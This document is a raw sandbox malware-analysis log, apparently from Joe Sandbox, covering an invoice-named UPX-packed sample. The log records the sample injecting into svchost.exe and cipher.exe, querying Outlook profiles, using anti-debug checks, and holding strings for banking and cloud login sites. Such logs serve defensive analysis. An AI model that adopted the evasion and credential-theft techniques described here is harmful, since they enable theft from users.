Source: C:\Windows\SysWOW64\cipher.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4522417554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4520103554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: cipher.pdbGCTL source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cipher.pdb source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_0102B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_0102B090
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F28B85 push ecx; ret 0_2_00F28B98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0048A060 push ecx; iretd 2_2_0048A076
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047A826 push ebx; ret 2_2_0047A82C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047503B push ebp; ret 2_2_0047503C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004770A9 push esi; ret 2_2_004770AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004731E0 push eax; ret 2_2_004731E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00486196 push eax; retf 2_2_00486198
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00474C31 push edx; retf 2_2_00474C3A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004814EC push ebp; ret 2_2_004814F5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047CCBA push es; iretd 2_2_0047CCBB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00482E43 push esi; retf 2_2_00482E4E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047CF10 push ecx; iretd 2_2_0047CF11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0047A7CC push ebx; ret 2_2_0047A82C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F0225F pushad ; ret 2_2_02F027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F027FA pushad ; ret 2_2_02F027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F0283D push eax; iretd 2_2_02F02858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx 2_2_02F309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F01368 push eax; iretd 2_2_02F01369
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053327FA pushad ; ret 4_2_053327F9
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0533225F pushad ; ret 4_2_053327F9
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_053609AD push ecx; mov dword ptr [esp], ecx 4_2_053609B6
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0533283D push eax; iretd 4_2_05332858
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_0533135D push eax; iretd 4_2_05331369
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032BE309 push ebp; ret 4_2_032BE312
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032D02A2 push eax; ret 4_2_032D02A3
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032C2FB3 push eax; retf 4_2_032C2FB5
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032C6E7D push ecx; iretd 4_2_032C6E93
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032B7643 push ebx; ret 4_2_032B7649
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032B75E9 push ebx; ret 4_2_032B7649
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032B1A4E push edx; retf 4_2_032B1A57
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032B1E58 push ebp; ret 4_2_032B1E59
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00F04A35
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F855FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00F855FD
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F233C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00F233C7
Source: C:\Users\user\Desktop\PI No 20000814C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
Source: C:\Windows\SysWOW64\cipher.exe Window / User API: threadDelayed 1772 Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Window / User API: threadDelayed 8201 Jump to behavior
Source: C:\Users\user\Desktop\PI No 20000814C.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\PI No 20000814C.exe API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
Source: C:\Windows\SysWOW64\cipher.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\cipher.exe TID: 5836 Thread sleep count: 1772 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe TID: 5836 Thread sleep time: -3544000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe TID: 5836 Thread sleep count: 8201 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe TID: 5836 Thread sleep time: -16402000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 Thread sleep count: 40 > 30 Jump to behavior
Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe TID: 1268 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cipher.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F64696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00F64696
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00F6C9C7
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6C93C FindFirstFileW,FindClose, 0_2_00F6C93C
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F6F200
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F6F35D
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00F6F65E
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F63A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F63A2B
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F63D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F63D4E
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F6BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00F6BF27
Source: C:\Windows\SysWOW64\cipher.exe Code function: 4_2_032CBBC0 FindFirstFileW,FindNextFileW,FindClose, 4_2_032CBBC0
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00F04AFE
Source: 227j94.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tVMware20,11696487552
Source: 227j94.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 227j94.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 227j94.4.dr Binary or memory string: discord.comVMware20,11696487552f
Source: 227j94.4.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 227j94.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,116964875=
Source: 227j94.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 227j94.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 227j94.4.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 227j94.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 227j94.4.dr Binary or memory string: global block list test formVMware20,11696487552
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696487552t
Source: 227j94.4.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 227j94.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hange Transaction PasswordVMware20,11696487552
Source: 227j94.4.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 227j94.4.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 227j94.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696487552}
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware
Source: 227j94.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11
Source: 227j94.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11696487552
Source: firefox.exe, 00000008.00000002.2521667010.000002456C8AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: 227j94.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 227j94.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 227j94.4.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 227j94.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 227j94.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 227j94.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 227j94.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 227j94.4.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,1169648
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rdVMware20,11696487552x
Source: 227j94.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 227j94.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 227j94.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kofamerica.comVMware20,11696487552x
Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524496472.000000000100F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: 227j94.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 227j94.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\PI No 20000814C.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PI No 20000814C.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PI No 20000814C.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cipher.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00487383 LdrLoadDll, 2_2_00487383
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F741FD BlockInput, 0_2_00F741FD
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00F03B4C
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_00F35CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 0_2_00F35CCC
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_0102B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_0102B090
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_018E3580 mov eax, dword ptr fs:[00000030h] 0_2_018E3580
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_018E3520 mov eax, dword ptr fs:[00000030h] 0_2_018E3520
Source: C:\Users\user\Desktop\PI No 20000814C.exe Code function: 0_2_018E1ED0 mov eax, dword ptr fs:[00000030h] 0_2_018E1ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov ecx, dword ptr fs:[00000030h] 2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300634F mov eax, dword ptr fs:[00000030h] 2_2_0300634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h] 2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h] 2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
